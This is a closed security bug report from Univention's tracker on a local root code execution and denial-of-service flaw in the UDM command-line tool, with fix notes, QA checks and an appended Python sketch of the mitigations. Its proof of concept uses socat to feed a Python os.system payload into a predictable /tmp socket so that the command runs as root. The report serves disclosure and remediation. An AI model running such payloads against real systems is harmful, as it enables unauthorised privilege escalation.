Univention Bugzilla – Full Text Bug Listing

| Summary: | local root code execution vulnerability as every user because UDM CLI uses sockets from /tmp/ | | |
|---|---|---|---|
| Product: | UCS | Reporter: | Florian Best <best> |
| Component: | UDM - CLI | Assignee: | Florian Best <best> |
| Status: | CLOSED FIXED | QA Contact: | Philipp Hahn <hahn> |
| Severity: | critical | | |
| Priority: | P5 | CC: | gohmann |
| Version: | UCS 4.1 | | |
| Target Milestone: | UCS 4.1-2-errata | | |
| Hardware: | Other | | |
| OS: | Linux | | |
| See Also: | https://forge.univention.org/bugzilla/show_bug.cgi?id=20610, https://forge.univention.org/bugzilla/show_bug.cgi?id=33224 | | |
| What kind of report is it?: | Security Issue | What type of bug is this?: | --- |
| Who will be affected by this bug?: | --- | How will those affected feel about the bug?: | --- |
| User Pain: | | Enterprise Customer affected?: | |
| School Customer affected?: | | ISV affected?: | |
| Waiting Support: | | Flags outvoted (downgraded) after PO Review: | |
| Ticket number: | | Bug group (optional): | Security |
| Max CVSS v3 score: | | | |
Description

Florian Best, 2016-01-13 11:21:57 CET

[DoS]: Therefore "nobody" is able to completely block every UDM-CLI call forever.

And another thing is that code is executed which is sent to the socket in both directions:

→ let user 'root' execute code (logged in as user nobody):

```
# su nobody
nobody:/$ mkdir /tmp/admincli_0
nobody:/$ printf "__import__('os').system('touch /tmp/evaled')\x00" | socat unix-listen:/tmp/admincli_0/sock stdin
nobody:/$ ls -l /tmp/evaled
-rw-r--r-- 1 root root 0 Jun 23 18:35 /tmp/evaled
```

→ Execute code on the server (harmless, as the same user):

```
printf "__import__('os').system('touch /tmp/evaled')\x00" | socat stdin unix-connect:/tmp/admincli_65534/sock
```

* Code is now evaluated with ast.literal_eval().
* Sockets are checked whether the UID is the same as the current/calling UID. → Should we also check permissions here?
* If the connection fails it is retried with a socket name containing random values, to prevent someone from making UDM unusable for non-root users.

univention-directory-manager-modules (11.0.3-17): r70594 | Bug #40422: fix local root code execution and MITM vulnerability

OK: r70594
OK: udm modules
OK: su -c '/usr/sbin/udm users/user' Administrator
OK: mkdir /tmp/admincli_2002;touch /tmp/admincli_200/socket{,.run};time su -c '/usr/sbin/udm users/user' Administrator # delayed ~30s

FYI: A user-visible progress indicator would be nice, as those 30s massively delay the CLI usage; bash-completion seems to be broken.

FIXED: univention-directory-manager-modules.yaml
r70667 | Bug #40422 et al: UDM YAML
OK: errata-announce -V --only univention-directory-manager-modules.yaml

(In reply to Philipp Hahn from comment #4)
> FYI: A user visible progress would be nice as those 30s massively delay the
> CLI usage ; bash-completion seems to be broken.

Yes, I saw this, too. I see no reason to wait 30 seconds. I'll add a note to Bug #33224.

*** Bug 37604 has been marked as a duplicate of this bug. ***
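As an added example (not code from this bug report or from UDM itself), the following Python sketches the mitigations the fix comment lists: messages from the socket peer are parsed with ast.literal_eval() instead of being executed, a socket under a shared directory such as /tmp is used only when the directory and the socket are owned by the calling UID and are not writable by group or others (this also answers the "should we check permissions" question in the comment), and a random fallback name is generated when the expected path cannot be trusted. Function names, the throwaway demo directory and the sample messages are assumptions constructed for this demo.

```python
# Added example, not Univention/UDM code: the checks described in the fix
# comment of Bug #40422. Names, paths and messages here are constructed.
import ast
import os
import secrets
import shutil
import socket
import stat
import tempfile
from typing import Optional, Tuple


def decode_message(payload: bytes) -> Tuple[bool, object]:
    """Decode one NUL-terminated message received from the peer.

    The pre-fix pattern handed the text to eval(), which runs whatever the
    peer sent. ast.literal_eval() only builds literals (strings, numbers,
    tuples, lists, dicts) and raises ValueError on calls, names or attribute
    access, so a code string is rejected instead of executed.
    """
    text = payload.rstrip(b"\x00").decode("utf-8")
    try:
        return True, ast.literal_eval(text)
    except (ValueError, SyntaxError):
        return False, None


def _owned_and_private(st: os.stat_result, uid: int) -> bool:
    """Owned by uid and not writable by group or others."""
    return st.st_uid == uid and not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def socket_path_is_trusted(path: str, expected_uid: Optional[int] = None) -> bool:
    """Accept a socket path in a shared directory only if the directory and
    the socket are owned by expected_uid (default: the calling UID) and
    neither is group/world writable. lstat() is used so a symlink planted by
    another account is not followed."""
    uid = os.getuid() if expected_uid is None else expected_uid
    try:
        dir_st = os.lstat(os.path.dirname(path) or ".")
        sock_st = os.lstat(path)
    except OSError:
        return False
    if not stat.S_ISDIR(dir_st.st_mode) or not _owned_and_private(dir_st, uid):
        return False
    if not stat.S_ISSOCK(sock_st.st_mode) or not _owned_and_private(sock_st, uid):
        return False
    return True


def fresh_socket_path(directory: str) -> str:
    """Fallback from the fix comment: when the expected name is unusable, pick
    a name nobody could have pre-created instead of failing outright."""
    return os.path.join(directory, "sock-" + secrets.token_hex(8))


def demo() -> dict:
    """Exercise the checks in a throwaway directory; returns which checks held."""
    base = tempfile.mkdtemp(prefix="admincli_demo_")  # mode 0700, owned by us
    results = {}
    try:
        good = os.path.join(base, "sock")
        srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        srv.bind(good)
        os.chmod(good, 0o600)
        results["own_socket_accepted"] = socket_path_is_trusted(good)

        # A regular file dropped where a socket is expected is not a socket.
        fake = os.path.join(base, "fake")
        with open(fake, "w"):
            pass
        results["plain_file_rejected"] = not socket_path_is_trusted(fake)

        # A socket anyone may write to fails the mode check.
        os.chmod(good, 0o666)
        results["world_writable_rejected"] = not socket_path_is_trusted(good)
        os.chmod(good, 0o600)

        # Another account's socket shows up as a UID mismatch; simulated here
        # by asking for a UID that is not ours.
        results["foreign_owner_rejected"] = not socket_path_is_trusted(
            good, expected_uid=os.getuid() + 1
        )

        results["fallback_name_differs"] = fresh_socket_path(base) != good
        srv.close()
    finally:
        shutil.rmtree(base)
    return results


if __name__ == "__main__":
    print(decode_message(b"__import__('os').getpid()\x00"))  # rejected
    print(decode_message(b"('users/user', {'username': 'demo'})\x00"))  # accepted
    print(demo())
```

The stat-based check still leaves a small window between lstat() and connect(); on Linux, reading SO_PEERCRED on the connected socket confirms the UID of the actual peer and closes that gap, which is the stronger check to add on top of the path validation shown here.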